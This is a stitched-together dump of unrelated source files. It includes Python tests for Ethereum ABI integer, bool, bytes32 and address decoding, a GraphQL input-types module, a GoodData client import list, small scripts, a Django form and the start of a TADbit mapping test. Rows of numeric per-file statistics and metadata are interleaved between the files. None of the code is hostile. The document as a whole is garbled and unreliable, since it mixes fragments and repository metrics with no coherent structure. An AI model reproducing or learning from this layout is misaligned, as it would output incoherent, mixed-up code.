(decode_hex('0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0000000000000000000000000000000000000000000000000000000000000001'), 1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'), -1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'), -100),
)
)
def test_int8_decoding(input, expected):
output = decode_single('int8', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000001'), 1),
(decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'), -1),
(decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'), -100),
)
)
def test_decode_int256(input, expected):
output = decode_single('int256', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0000000000000000000000000000000000000000000000000000000000000001'), 1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'), -1),
(decode_hex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'), -100),
)
)
def test_decode_accepts_bytes(input, expected):
output = decode_single('int256', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000015'), 21),
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000001'), 1),
(
decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'),
2 ** 256 - 1,
),
(
decode_hex('0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff9c'),
2 ** 256 -100,
),
)
)
def test_decode_uint256(input, expected):
output = decode_single('uint256', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000001'), True),
(decode_hex('0x0000000000000000000000000000000000000000000000000000000000000000'), False),
)
)
def test_decode_bool(input, expected):
output = decode_single('bool', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(
decode_hex('0x7465737400000000000000000000000000000000000000000000000000000000'),
b'test\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
),
(
decode_hex('0x6162636465666768696a6b6c6d6e6f707172737475767778797a000000000000'),
b'abcdefghijklmnopqrstuvwxyz\x00\x00\x00\x00\x00\x00',
),
(
decode_hex('0x3031323334353637383921402324255e262a2829000000000000000000000000'),
b'0123456789!@#$%^&*()\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
),
(
decode_hex('0x6162630000000000616263000000000000000000000000000000000000000000'),
b'abc\x00\x00\x00\x00\x00abc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
),
)
)
def test_decode_bytes32(input, expected):
output = decode_single('bytes32', input)
assert output == expected
@pytest.mark.parametrize(
'input,expected',
(
(
decode_hex('0x0000000000000000000000000000000000000000000000000000000000000000'),
'0x0000000000000000000000000000000000000000',
),
(
decode_hex('0x000000000000000000000000c305c901078781c232a2a521c2af7980f8385ee9'),
'0xc305c901078781c232a2a521c2af7980f8385ee9',
),
(
decode_hex('0x0000000000000000000000000005c901078781c232a2a521c2af7980f8385ee9'),
'0x0005c901078781c232a2a521c2af7980f8385ee9',
),
(
decode_hex('0x000000000000000000000000c305c901078781c232a2a521c2af7980f8385000'),
'0xc305c901078781c232a2a521c2af7980f8385000',
),
(
decode_hex('0x0000000000000000000000000005c901078781c232a2a521c2af7980f8385000'),
'0x0005c901078781c232a2a521c2af7980f8385000',
),
)
)
def test_decode_address(input, expected):
output = decode_single('address', input)
assert output == expected
| 35.947368
| 132
| 0.711933
| 373
| 5,464
| 10.265416
| 0.171582
| 0.103421
| 0.143379
| 0.175503
| 0.611648
| 0.571167
| 0.571167
| 0.571167
| 0.564116
| 0.564116
| 0
| 0.384183
| 0.185395
| 5,464
| 151
| 133
| 36.18543
| 0.476073
| 0
| 0
| 0.406015
| 0
| 0.022556
| 0.500549
| 0.471449
| 0
| 0
| 0.267936
| 0
| 0.06015
| 1
| 0.06015
| false
| 0
| 0.022556
| 0
| 0.082707
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
f5f65c50585da913ebd3d7c75e880ec902195df0
| 391
|
py
|
Python
|
snoberry/schema/mutation/input_types.py
|
paul-sud/snoberry
|
94bd45b750f9fd7fd3be367a74623e9551f4f765
|
[
"MIT"
] | null | null | null |
snoberry/schema/mutation/input_types.py
|
paul-sud/snoberry
|
94bd45b750f9fd7fd3be367a74623e9551f4f765
|
[
"MIT"
] | null | null | null |
snoberry/schema/mutation/input_types.py
|
paul-sud/snoberry
|
94bd45b750f9fd7fd3be367a74623e9551f4f765
|
[
"MIT"
] | null | null | null |
from typing import List, Optional
import strawberry
from ...models import ChildModel, ParentModel
@strawberry.experimental.pydantic.input(model=ChildModel, fields=["name"])
class ChildInput:
pass
@strawberry.experimental.pydantic.input(model=ParentModel, fields=["name"])
class ParentInput:
children: Optional[List[ChildInput]] = None
child_ids: Optional[List[str]] = None
| 23
| 75
| 0.764706
| 44
| 391
| 6.772727
| 0.545455
| 0.147651
| 0.201342
| 0.234899
| 0.268456
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.120205
| 391
| 16
| 76
| 24.4375
| 0.866279
| 0
| 0
| 0
| 0
| 0
| 0.02046
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.1
| 0.3
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
f5fbae0aa3900c9f3c6d9db5f912e2880c7c0177
| 8,566
|
py
|
Python
|
gooddata-afm-client/gooddata_afm_client/models/__init__.py
|
hkad98/gooddata-python-sdk
|
64942080ecb44c2d8e914e57f7a591daa6cca205
|
[
"MIT"
] | null | null | null |
gooddata-afm-client/gooddata_afm_client/models/__init__.py
|
hkad98/gooddata-python-sdk
|
64942080ecb44c2d8e914e57f7a591daa6cca205
|
[
"MIT"
] | null | null | null |
gooddata-afm-client/gooddata_afm_client/models/__init__.py
|
hkad98/gooddata-python-sdk
|
64942080ecb44c2d8e914e57f7a591daa6cca205
|
[
"MIT"
] | null | null | null |
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from from gooddata_afm_client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from gooddata_afm_client.model.afm import AFM
from gooddata_afm_client.model.absolute_date_filter import AbsoluteDateFilter
from gooddata_afm_client.model.absolute_date_filter_absolute_date_filter import AbsoluteDateFilterAbsoluteDateFilter
from gooddata_afm_client.model.abstract_measure_value_filter import AbstractMeasureValueFilter
from gooddata_afm_client.model.afm_execution import AfmExecution
from gooddata_afm_client.model.afm_execution_response import AfmExecutionResponse
from gooddata_afm_client.model.afm_identifier import AfmIdentifier
from gooddata_afm_client.model.afm_local_identifier import AfmLocalIdentifier
from gooddata_afm_client.model.afm_object_identifier import AfmObjectIdentifier
from gooddata_afm_client.model.afm_object_identifier_attribute import AfmObjectIdentifierAttribute
from gooddata_afm_client.model.afm_object_identifier_attribute_identifier import AfmObjectIdentifierAttributeIdentifier
from gooddata_afm_client.model.afm_object_identifier_core import AfmObjectIdentifierCore
from gooddata_afm_client.model.afm_object_identifier_core_identifier import AfmObjectIdentifierCoreIdentifier
from gooddata_afm_client.model.afm_object_identifier_dataset import AfmObjectIdentifierDataset
from gooddata_afm_client.model.afm_object_identifier_dataset_identifier import AfmObjectIdentifierDatasetIdentifier
from gooddata_afm_client.model.afm_object_identifier_identifier import AfmObjectIdentifierIdentifier
from gooddata_afm_client.model.afm_object_identifier_label import AfmObjectIdentifierLabel
from gooddata_afm_client.model.afm_object_identifier_label_identifier import AfmObjectIdentifierLabelIdentifier
from gooddata_afm_client.model.afm_valid_objects_query import AfmValidObjectsQuery
from gooddata_afm_client.model.afm_valid_objects_response import AfmValidObjectsResponse
from gooddata_afm_client.model.arithmetic_measure_definition import ArithmeticMeasureDefinition
from gooddata_afm_client.model.arithmetic_measure_definition_arithmetic_measure import ArithmeticMeasureDefinitionArithmeticMeasure
from gooddata_afm_client.model.attribute_execution_result_header import AttributeExecutionResultHeader
from gooddata_afm_client.model.attribute_filter import AttributeFilter
from gooddata_afm_client.model.attribute_filter_elements import AttributeFilterElements
from gooddata_afm_client.model.attribute_header import AttributeHeader
from gooddata_afm_client.model.attribute_header_out import AttributeHeaderOut
from gooddata_afm_client.model.attribute_item import AttributeItem
from gooddata_afm_client.model.attribute_result_header import AttributeResultHeader
from gooddata_afm_client.model.comparison_measure_value_filter import ComparisonMeasureValueFilter
from gooddata_afm_client.model.comparison_measure_value_filter_comparison_measure_value_filter import ComparisonMeasureValueFilterComparisonMeasureValueFilter
from gooddata_afm_client.model.data_column_locator import DataColumnLocator
from gooddata_afm_client.model.data_column_locators import DataColumnLocators
from gooddata_afm_client.model.date_filter import DateFilter
from gooddata_afm_client.model.dimension import Dimension
from gooddata_afm_client.model.dimension_header import DimensionHeader
from gooddata_afm_client.model.element import Element
from gooddata_afm_client.model.elements_request import ElementsRequest
from gooddata_afm_client.model.elements_response import ElementsResponse
from gooddata_afm_client.model.execution_links import ExecutionLinks
from gooddata_afm_client.model.execution_response import ExecutionResponse
from gooddata_afm_client.model.execution_result import ExecutionResult
from gooddata_afm_client.model.execution_result_grand_total import ExecutionResultGrandTotal
from gooddata_afm_client.model.execution_result_header import ExecutionResultHeader
from gooddata_afm_client.model.execution_result_paging import ExecutionResultPaging
from gooddata_afm_client.model.execution_settings import ExecutionSettings
from gooddata_afm_client.model.filter_by import FilterBy
from gooddata_afm_client.model.filter_definition import FilterDefinition
from gooddata_afm_client.model.filter_definition_for_simple_measure import FilterDefinitionForSimpleMeasure
from gooddata_afm_client.model.header_group import HeaderGroup
from gooddata_afm_client.model.inline_filter_definition import InlineFilterDefinition
from gooddata_afm_client.model.inline_filter_definition_inline import InlineFilterDefinitionInline
from gooddata_afm_client.model.inline_measure_definition import InlineMeasureDefinition
from gooddata_afm_client.model.inline_measure_definition_inline import InlineMeasureDefinitionInline
from gooddata_afm_client.model.measure_definition import MeasureDefinition
from gooddata_afm_client.model.measure_execution_result_header import MeasureExecutionResultHeader
from gooddata_afm_client.model.measure_group_header import MeasureGroupHeader
from gooddata_afm_client.model.measure_header_out import MeasureHeaderOut
from gooddata_afm_client.model.measure_item import MeasureItem
from gooddata_afm_client.model.measure_result_header import MeasureResultHeader
from gooddata_afm_client.model.measure_value_filter import MeasureValueFilter
from gooddata_afm_client.model.negative_attribute_filter import NegativeAttributeFilter
from gooddata_afm_client.model.negative_attribute_filter_negative_attribute_filter import NegativeAttributeFilterNegativeAttributeFilter
from gooddata_afm_client.model.paging import Paging
from gooddata_afm_client.model.pop_dataset import PopDataset
from gooddata_afm_client.model.pop_dataset_measure_definition import PopDatasetMeasureDefinition
from gooddata_afm_client.model.pop_dataset_measure_definition_previous_period_measure import PopDatasetMeasureDefinitionPreviousPeriodMeasure
from gooddata_afm_client.model.pop_date import PopDate
from gooddata_afm_client.model.pop_date_measure_definition import PopDateMeasureDefinition
from gooddata_afm_client.model.pop_date_measure_definition_over_period_measure import PopDateMeasureDefinitionOverPeriodMeasure
from gooddata_afm_client.model.pop_measure_definition import PopMeasureDefinition
from gooddata_afm_client.model.positive_attribute_filter import PositiveAttributeFilter
from gooddata_afm_client.model.positive_attribute_filter_positive_attribute_filter import PositiveAttributeFilterPositiveAttributeFilter
from gooddata_afm_client.model.problem import Problem
from gooddata_afm_client.model.range_measure_value_filter import RangeMeasureValueFilter
from gooddata_afm_client.model.range_measure_value_filter_range_measure_value_filter import RangeMeasureValueFilterRangeMeasureValueFilter
from gooddata_afm_client.model.ranking_filter import RankingFilter
from gooddata_afm_client.model.ranking_filter_ranking_filter import RankingFilterRankingFilter
from gooddata_afm_client.model.relative_date_filter import RelativeDateFilter
from gooddata_afm_client.model.relative_date_filter_relative_date_filter import RelativeDateFilterRelativeDateFilter
from gooddata_afm_client.model.rest_api_identifier import RestApiIdentifier
from gooddata_afm_client.model.result_dimension import ResultDimension
from gooddata_afm_client.model.result_dimension_headers_inner import ResultDimensionHeadersInner
from gooddata_afm_client.model.result_spec import ResultSpec
from gooddata_afm_client.model.simple_measure_definition import SimpleMeasureDefinition
from gooddata_afm_client.model.simple_measure_definition_measure import SimpleMeasureDefinitionMeasure
from gooddata_afm_client.model.sort_key import SortKey
from gooddata_afm_client.model.sort_key_attribute import SortKeyAttribute
from gooddata_afm_client.model.sort_key_attribute_attribute import SortKeyAttributeAttribute
from gooddata_afm_client.model.sort_key_value import SortKeyValue
from gooddata_afm_client.model.sort_key_value_value import SortKeyValueValue
from gooddata_afm_client.model.status_type import StatusType
from gooddata_afm_client.model.total import Total
from gooddata_afm_client.model.total_dimension import TotalDimension
from gooddata_afm_client.model.total_execution_result_header import TotalExecutionResultHeader
from gooddata_afm_client.model.total_result_header import TotalResultHeader
| 79.314815
| 158
| 0.922601
| 1,049
| 8,566
| 7.140133
| 0.186845
| 0.155407
| 0.194259
| 0.271963
| 0.525768
| 0.484513
| 0.366622
| 0.256876
| 0.109746
| 0
| 0
| 0.000123
| 0.05265
| 8,566
| 107
| 159
| 80.056075
| 0.922859
| 0.042027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
eb0246a909748dd6551cdf27e2db84056ea8fe20
| 184
|
py
|
Python
|
Problem3.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
Problem3.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
Problem3.py
|
aerokappa/ProjectEuler
|
3a7178992a5ab7c1eaad4629c1e191b1998a0986
|
[
"MIT"
] | null | null | null |
# Project Euler Problem 3: largest prime factor of 600851475143.
from smallestPrimeDivisor import smallestPrimeDivisor
from allPrimeFactors import allPrimeFactors

n = 600851475143
allPrimeDivisors = allPrimeFactors( n )
# allPrimeFactors returns the factors in order, so the last entry is the
# largest prime factor. Fixed: was a Python 2 print statement
# ("print allPrimeDivisors[-1]"), a SyntaxError under Python 3.
print(allPrimeDivisors[-1])
| 23
| 53
| 0.853261
| 16
| 184
| 9.8125
| 0.5625
| 0.203822
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079268
| 0.108696
| 184
| 8
| 54
| 23
| 0.878049
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.4
| null | null | 0.2
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
eb0491082841a6b09a4fe544ca67206c9bdc4127
| 82
|
py
|
Python
|
HighSchool/Python/DoNow103/code.py
|
SomeAspy/SchoolRepos
|
57a45a8dfae19fda604d1a68f716f6b8da4fb614
|
[
"MIT"
] | null | null | null |
HighSchool/Python/DoNow103/code.py
|
SomeAspy/SchoolRepos
|
57a45a8dfae19fda604d1a68f716f6b8da4fb614
|
[
"MIT"
] | null | null | null |
HighSchool/Python/DoNow103/code.py
|
SomeAspy/SchoolRepos
|
57a45a8dfae19fda604d1a68f716f6b8da4fb614
|
[
"MIT"
] | null | null | null |
# Aiden Baker
# 2/12/2021
# DoNow103

# Same three outputs as before, written with named intermediates:
# 30, "abc", and "abcbde".
product = 2 * 3 * 5
print(product)
first = "abc"
print(first)
print(first + "bde")
| 11.714286
| 18
| 0.634146
| 15
| 82
| 3.466667
| 0.733333
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180556
| 0.121951
| 82
| 7
| 18
| 11.714286
| 0.541667
| 0.365854
| 0
| 0
| 0
| 0
| 0.183673
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 5
|
eb213e1f74fd9706e3867cb258dd1c3180e7fdda
| 52
|
py
|
Python
|
test/examples/toplevel/one/.shovel/__init__.py
|
demiurgestudios/shovel
|
3db497164907d3765fae182959147d19064671c7
|
[
"MIT"
] | 202
|
2015-01-12T13:47:29.000Z
|
2022-02-09T19:13:36.000Z
|
test/examples/toplevel/one/.shovel/__init__.py
|
demiurgestudios/shovel
|
3db497164907d3765fae182959147d19064671c7
|
[
"MIT"
] | 14
|
2017-04-09T17:04:53.000Z
|
2021-05-16T11:08:34.000Z
|
test/examples/toplevel/one/.shovel/__init__.py
|
demiurgestudios/shovel
|
3db497164907d3765fae182959147d19064671c7
|
[
"MIT"
] | 22
|
2015-09-11T18:35:10.000Z
|
2021-05-16T11:04:56.000Z
|
from shovel import task
@task
def whiz():
    # Intentionally empty shovel task: registers the name "whiz" with the
    # task runner and does nothing when invoked.
    pass
| 8.666667
| 23
| 0.673077
| 8
| 52
| 4.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 52
| 5
| 24
| 10.4
| 0.897436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0.25
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
de48d29a59049fc4365ace77aa8d21bf46c65719
| 232
|
py
|
Python
|
gail_airl_ppo/network/__init__.py
|
caoxixiya/od_irl
|
cc5da49344174859b74ad67b9abe6d910b4159d0
|
[
"MIT"
] | null | null | null |
gail_airl_ppo/network/__init__.py
|
caoxixiya/od_irl
|
cc5da49344174859b74ad67b9abe6d910b4159d0
|
[
"MIT"
] | null | null | null |
gail_airl_ppo/network/__init__.py
|
caoxixiya/od_irl
|
cc5da49344174859b74ad67b9abe6d910b4159d0
|
[
"MIT"
] | 1
|
2021-09-06T02:58:09.000Z
|
2021-09-06T02:58:09.000Z
|
from .policy import StateDependentPolicy, StateIndependentPolicy
from .value import StateFunction, StateActionFunction, TwinnedStateActionFunction
from .disc import GAILDiscrim, AIRLDiscrim, ODIRLDiscrim
from .cla import DeltaReward
| 58
| 81
| 0.875
| 21
| 232
| 9.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086207
| 232
| 4
| 82
| 58
| 0.957547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
de494ea3ea796de58feeb80b61f3680dc4584e1a
| 57
|
py
|
Python
|
automatic/webhookbot.py
|
therealebraheem/Moon
|
20de5f36d98fa77df86752183feebb735ed98359
|
[
"Unlicense"
] | null | null | null |
automatic/webhookbot.py
|
therealebraheem/Moon
|
20de5f36d98fa77df86752183feebb735ed98359
|
[
"Unlicense"
] | null | null | null |
automatic/webhookbot.py
|
therealebraheem/Moon
|
20de5f36d98fa77df86752183feebb735ed98359
|
[
"Unlicense"
] | null | null | null |
# TODO: add webhook code to send codes in server channel
| 28.5
| 56
| 0.77193
| 10
| 57
| 4.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192982
| 57
| 1
| 57
| 57
| 0.956522
| 0.947368
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 1
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
de5d401133f332a4623682e7f251cedb7f6ec65a
| 72
|
py
|
Python
|
orange3/Orange/clustering/__init__.py
|
rgschmitz1/BioDepot-workflow-builder
|
f74d904eeaf91ec52ec9b703d9fb38e9064e5a66
|
[
"MIT"
] | 54
|
2017-01-08T17:21:49.000Z
|
2021-11-02T08:46:07.000Z
|
orange3/Orange/clustering/__init__.py
|
Synthia-3/BioDepot-workflow-builder
|
4ee93abe2d79465755e82a145af3b6a6e1e79fd4
|
[
"MIT"
] | 22
|
2017-03-28T06:03:14.000Z
|
2021-07-28T05:43:55.000Z
|
orange3/Orange/clustering/__init__.py
|
Synthia-3/BioDepot-workflow-builder
|
4ee93abe2d79465755e82a145af3b6a6e1e79fd4
|
[
"MIT"
] | 21
|
2017-01-26T21:12:09.000Z
|
2022-01-31T21:34:59.000Z
|
from .dbscan import *
from .hierarchical import *
from .kmeans import *
| 18
| 27
| 0.75
| 9
| 72
| 6
| 0.555556
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 72
| 3
| 28
| 24
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
de661a011eb9841b3a9fec560a12eff54997279a
| 508
|
py
|
Python
|
HeadBasedInteractionPy/runForDebug.py
|
muratcancicek/Head_Based_Interaction
|
40716d60d900251d2711c6b781627b1fe583e358
|
[
"Apache-2.0"
] | 5
|
2019-06-13T23:24:50.000Z
|
2021-01-08T10:57:05.000Z
|
HeadBasedInteractionPy/runForDebug.py
|
muratcancicek/Head_Based_Interaction
|
40716d60d900251d2711c6b781627b1fe583e358
|
[
"Apache-2.0"
] | 5
|
2019-06-24T16:38:37.000Z
|
2021-11-15T16:56:24.000Z
|
HeadBasedInteractionPy/runForDebug.py
|
muratcancicek/Head_Based_Interaction
|
40716d60d900251d2711c6b781627b1fe583e358
|
[
"Apache-2.0"
] | 1
|
2019-06-23T18:17:13.000Z
|
2019-06-23T18:17:13.000Z
|
# Author: Muratcan Cicek, https://users.soe.ucsc.edu/~cicekm/
from InteractionDemos.DemoBuilder import run
from InteractionDemos.InputEstimationDemo.InputEstDemoHandler import playInputEst
from InteractionDemos.MappingDemo.MappingDemoHandler import playMapping
from InteractionDemos.InputEstimationDemo.EstimationPlotter import plot
from paths import InputEstimatorsDemo_Folder
def main():
    """Run the currently selected interaction demo.

    The alternative demo entry points are kept as commented-out calls so a
    developer can switch demos by toggling lines while debugging.
    """
    playMapping()
    #run()
    #playInputEst()
    #plot()

if __name__ == '__main__':
    main()
    # Printed after the selected demo returns, as a completion marker.
    print('Done')
| 31.75
| 81
| 0.791339
| 49
| 508
| 8.020408
| 0.632653
| 0.203562
| 0.198473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.122047
| 508
| 16
| 82
| 31.75
| 0.881166
| 0.165354
| 0
| 0
| 0
| 0
| 0.028571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| true
| 0
| 0.5
| 0
| 0.6
| 0.1
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
de7af71a163c2861589f71fc852f372ce19df23d
| 148
|
py
|
Python
|
pub/functions/forms.py
|
DASTUDIO/MyVHost
|
b9eda56a67c2df9236b7866087bc7f465542f951
|
[
"MIT"
] | 2
|
2021-07-27T10:38:57.000Z
|
2021-10-10T20:42:56.000Z
|
pub/functions/forms.py
|
DASTUDIO/MyVHost
|
b9eda56a67c2df9236b7866087bc7f465542f951
|
[
"MIT"
] | null | null | null |
pub/functions/forms.py
|
DASTUDIO/MyVHost
|
b9eda56a67c2df9236b7866087bc7f465542f951
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from django import forms as f
class reg(f.Form):
    """Registration form with username, password and phone text fields.

    NOTE(review): the class name "reg" is lowercase, contrary to PEP 8
    (PascalCase for classes); left unchanged because external callers may
    reference it by this name.
    """
    # All three are plain CharFields; no max_length or widget customisation
    # (the password field is NOT masked — no PasswordInput widget).
    username = f.CharField()
    password = f.CharField()
    phone = f.CharField()
| 21.142857
| 29
| 0.662162
| 22
| 148
| 4.454545
| 0.727273
| 0.306122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.209459
| 148
| 7
| 30
| 21.142857
| 0.82906
| 0.081081
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.2
| 0.2
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 5
|
deb03b01603c045427f8d594952d22a212b720eb
| 7,634
|
py
|
Python
|
tests/test_tb_full_mapping.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 2
|
2017-07-31T11:45:46.000Z
|
2017-08-09T09:32:35.000Z
|
tests/test_tb_full_mapping.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 28
|
2016-11-17T11:12:32.000Z
|
2018-11-02T14:09:13.000Z
|
tests/test_tb_full_mapping.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 4
|
2017-02-12T17:47:21.000Z
|
2018-05-29T08:16:27.000Z
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import gzip
import pytest
from basic_modules.metadata import Metadata
from tool.gem_indexer import gemIndexerTool
from tool.tb_full_mapping import tbFullMappingTool
def generate_gem():
    """
    Create the GEM file

    Decompresses the bundled reference FASTA into the test data directory,
    then runs the project's GEM indexer over it. Side effects only: writes
    the decompressed FASTA and the GEM index files under ``data/``.
    """
    resource_path = os.path.join(os.path.dirname(__file__), "data/")
    genome_fa = resource_path + "tb.Human.GCA_000001405.22.fasta"
    genome_gem_fa = resource_path + "tb.Human.GCA_000001405.22_gem.fasta"
    # gzip opened in 'rb' yields bytes, so the destination is opened 'wb'.
    with gzip.open(genome_fa + '.gz', 'rb') as fgz_in:
        with open(genome_fa, 'wb') as f_out:
            f_out.write(fgz_in.read())
